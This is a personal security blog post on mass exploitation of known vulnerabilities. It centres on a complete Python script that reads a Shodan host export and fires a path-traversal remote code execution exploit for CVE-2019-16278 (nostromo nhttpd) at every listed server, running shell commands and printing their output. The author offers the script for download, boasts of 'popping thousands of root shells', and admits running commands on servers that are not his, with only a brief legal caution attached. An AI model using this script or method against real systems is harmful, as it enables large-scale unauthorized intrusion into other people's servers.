Mass Exploitation, Hunting While Sleeping


~ 4 minute read
Crafted : 4 months ago Updated : 1 week ago
Tags:
#infosec #guide #cybersecurity #bug-bounty #vulnerability #iot #shodan #zoomeye #censys

Hello Luvs,

This post is just another brain dump, like the last post. Today we are going to talk about mass exploitation. Criminals usually use mass exploitation to control as much as hosts as they can. As you may know, I've worked on a tool called Hunter Suite, which aimed to be a revolution for bug hunting. But my life is so unpredictable these days; I'm not sure when or if I really can finish it (too much work for one boy). That's why I started sharing my thoughts in the hope of someone out there will find it useful. 

 

Table of Contents

 

Introduction 

Botnets are generally very successful exploiting vulnerable IoT and Web because of the number of exploitable hosts out there. You can check out the list of exploits used by Miari and more recently Mozi . The fun fact is most bot authors are not familiar with exploit development concepts (even though IoT exploits are a breeze to write compared to harder stuff like browsers), So they usually use public and, in most cases, outdated exploits. 

One component of the hunter suite is to exploit hot vulnerabilities. You are using either of these two methods.

 

  • slightly modify and use an excellent 1-day exploit 
    • fixing reliability issues and crashes 
    • changing payloads 
  • conduct a patch analysis to mine a 1-day
    • Reverse the patch and extract the bug
    • Write an exploit 

Whats a good 1-day exploit? 

Well, it depends, but usually, you don't want to waste your time on writing an exploit for a target with <5 users. 

So, for example, in the case of web exploitation, here are some worthy targets. 

 

Content management systems (also their plugins):

  • WordPress
  • Joomla
  • Drupal
  • ...

Backend Web Frameworks:

  • Rails
  • Django
  • Laravel
  • ...

Front End Frameworks:

  • Vue
  • Angular
  • React
  • Bootstrap 
  • ...

Web Servers:

  • Nginx
  • Apache
  • Lite HTTP
  • ....

Internet of things: 

  • Big market Routers 
  • IP cameras 
  • SCADA
  • ....

You get the idea. 

Practicality 

As you aren't malicious, you won't need an implant or backdoor. Botnets usually have to create various versions of their implants (MISP, ARM, X86, x84, etc.) to maximize their infection rate.

Next is to scan the whole target IP space (e.g., bug bounty pipeline) for vulnerable assets. There are few tools on the market for attack surface discovery like assetnote.io and immuniweb . You can also leverage APIs like shodan.io zoomeye.org and censys.io to make your life easier. here is an illustration for visual people.

 

 

CVE-2019-16278 nhttpd (nostromo) < 1.9.7 pre-auth RCE

 

As you see in all my previous posts, I like to have a practical case study. for the sake of this post, I chose a very recent vulnerability in nhttpd. 

here is the original exploit

and here is a detailed vulnerability analysis So I jump into a live example. If we search for Nostromo in, for instance, shodan.io, we will see thousands of running instances. 

 

Now, all we have to do is to detect and exploit the vulnerable instances. And I already talked about it before, these days it can be speedy. So all we have to is parse our host lists (in this case shodan export) and try to exploit vulnerable instances. 

 

Here is how your script can look.
 

"""

 @author: 0xSha

 @contact: [email protected]

 @organization: www.0xsha.io

 """

  

 import csv

 import requests

  

  

 # in case of debugging and hosting detection

 # import json

 # import time

  

  

 def read_hosts_from_csv():

  """

  reads the shodan cvs dump and extract host and ports

  @:parameter none

  :return: host lists

  """

  path = '/shodan-export.csv'

  host_lists = []

  with open(path, newline='') as csvfile:

  records = csv.reader(csvfile)

  for record in records:

  host_lists.append(record[0] + ":" + record[1])

  return host_lists

  

  

 if __name__ == '__main__':

  # proxy = {"http": "http://127.0.0.1:8080"}

  exp = "/.%0d./.%0d./.%0d./.%0d./bin/sh"

  for host in read_hosts_from_csv():

  host, port = host.split(':')

  # Lazy Me

  if "IP" not in host:

  

  # Debugging request

  # req = requests.post('http://' + host + ":" + port+exp,

  # data='ifconfig 2>&1; echo "~~~~~~~~~"; id; echo "##########";', timeout=3,

  # proxies=proxy)

  try:

  

  cmd = "whoami;id;uname -a"

  print("[~] Trying ... " + host, port)

  req2 = requests.post('http://' + host + ":" + port + exp,

  data='ifconfig 2>&1; echo "~~~~~~~~~~"; ' + cmd + ' ; echo "##########";',

  timeout=10) # change the timeout if needed

  

  # print (req2.status_code)

  # print (req2.text)

  firstIndex = str(req2.text).find('~~~~~~~~~~')

  secondIndex = str(req2.text).find('##########')

  

  if firstIndex:

  print("#################### Vulnerable #######################")

  print("[+] Now exploiting "+host)

  print(str(req2.text)[firstIndex + 10:secondIndex])

  

  # Host Detection

  # time.sleep(10)

  # req3 = requests.get(

  # 'https://www.who-hosts-this.com/APIEndpoint/Detect?key'

  # '=YOUR_API_KEY&url=' + host)

  # isp = json.loads(req3.text)

  # print("Hosted by:" + isp['results'][0]['isp_name'])

  

  print("#################### End #######################")

  except:

  # print('Err' + host)

  pass

 

You can also download the script from here. Now, all we have to do is run our script and pour ourselves a coffe. 

 

Popping thousands of root shells 

 

Here is the video for demo lovers. 

 

 

Conclusion 

 

The amount of vulnerable hosts out there is unbelievable., more internet-wide bug bounty programs needed to slay these bugs otherwise botnets will have easy wins just using 1-day exploits. 

Careful luvs, what I demonstrate here can get you in legal trouble, in my case, I didn't alter, download, touch any data on any few servers I tested, and the only commands I ran are harmless id to proof of the vulnerability. Do now pwn what you don't own.  

 

 

So here is a summary 

  • know your assets 
  • set the alarm for worthy patches and exploits 
  • continuously scan your pipeline for new instances
  • detect and exploit 
  • report and claim your bounty 

 

Infosec has always been a part of my life. I made a living out of it, but I somehow feel people care less every day (maybe because they can't do anything about it?!), So in the end, I'm probably better off creating drama TV shows ;) rather than talking about fuzzing, exploitation, reverse engineering and how I spend thousands of bucks and most of my life on infosec and SciTech. Yet again, here I am. 

 

till then luvs 

Assist me:
Buy Me a Coffee at ko-fi.com